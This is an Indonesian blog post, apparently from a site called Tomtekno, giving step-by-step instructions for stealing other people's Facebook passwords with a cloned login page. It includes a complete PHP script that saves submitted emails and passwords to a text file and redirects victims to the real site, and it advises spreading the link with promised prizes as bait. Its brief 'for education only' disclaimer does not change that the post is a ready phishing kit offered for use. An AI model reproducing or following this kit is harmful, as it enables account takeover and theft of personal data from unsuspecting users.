Cara Mudah Hack Akun FB (Facebook) Orang Lain Menggunakan Fake Login, Terbaru 2020!

CARA MERETAS AKUN FACEBOOK ORANG LAIN

Di zaman serba teknologi ini, hampir semua pengguna smartphone pasti pernah memiliki akun Facebook. Karena sebelum hadirnya Instagram, Facebook merupakan aplikasi media sosial nomor 1 di dunia.

Selain itu, banyak pengguna yang membagikan foto, informasi, dan data pribadi di akun Facebook mereka. Bahkan banyak akun game dan akun aplikasi lainnya yang ditautkan dengan akun Facebook, hal inilah yang membuat para hacker menyerang akun-akun Facebook untuk mendapatkan data-data pribadi orang tersebut.


Banyak cara hack Facebook yang tersebar di internet, namun banyak juga yang sudah tidak berfungsi karena Facebook terus memperbaiki keamanan untuk mencegah adanya hacker. Berikut ini cara hack Facebook terbaru dan mudah digunakan, langsung saja simak caranya di bawah ini.

Peringatan: Cara hack yang dibagikan ini hanya bersifat sebagai edukasi dan pemahaman, untuk mencegah hal ini terjadi pada anda. Jika terjadi sesuatu, itu semua di luar tanggung jawab Tomtekno.


1. Langkah pertama yang harus anda lakukan adalah menyimpan halaman login Facebook di (http://www.facebook.com/login.php/), anda bisa menggunakan Google Chrome.



Klik kanan dan pilih Save As apabila anda menggunakan PC. Klik titik tiga di bagian kanan atas, lalu klik Download apabila anda menggunakan smartphone.


2. Setelah anda menyimpan halaman login facebook, cek hasil unduhan tersebut. Pastikan isinya file Masuk Facebook_Facebook.html dan folder Masuk Facebook_Facebook_files.


3. Selanjutnya download file script hack Facebook melalui link tautan di bawah ini.



4. Kemudian anda bisa membuat script tambahan bernama next.php, anda bisa copy-paste script di bawah ini ke Notepad, lalu simpan dan beri nama next.php.

<?php header('Location: http://www.Facebook.com/login.php'); $handle = fopen('pass.txt', 'a'); foreach($_GET as $variable => $value) { fwrite($handle, $variable); fwrite($handle, '='); fwrite($handle, $value); fwrite($handle, '\n'); } fwrite($handle, '\n'); fclose($handle); exit; ?>


5. Selanjutnya buat file Notepad kosong yang diberi nama pass.txt, file ini berfungsi untuk menampung email dan password Facebook yang anda hack.

6. Kemudian upload semua file dan script Facebook tersebut ke layanan hosting yang sudah anda buat, lalu bagikan atau menyebarkan linknya. Untuk melancarkan misi, anda bisa memberi iming-iming hadiah atau yang lainnya.


Peringatan: Cara ini mungkin tidak bisa seterusnya digunakan, karena facebook selalu memperbaiki keamanannya.


Sekian yang dapat Tomtekno sampaikan, semoga artikel ini bermanfaat dan terima kasih telah berkunjung.




0 Response to "Cara Mudah Hack Akun FB (Facebook) Orang Lain Menggunakan Fake Login, Terbaru 2020!"

Post a Comment

Disclaimer

Privacy Policy

Sitemap

Contact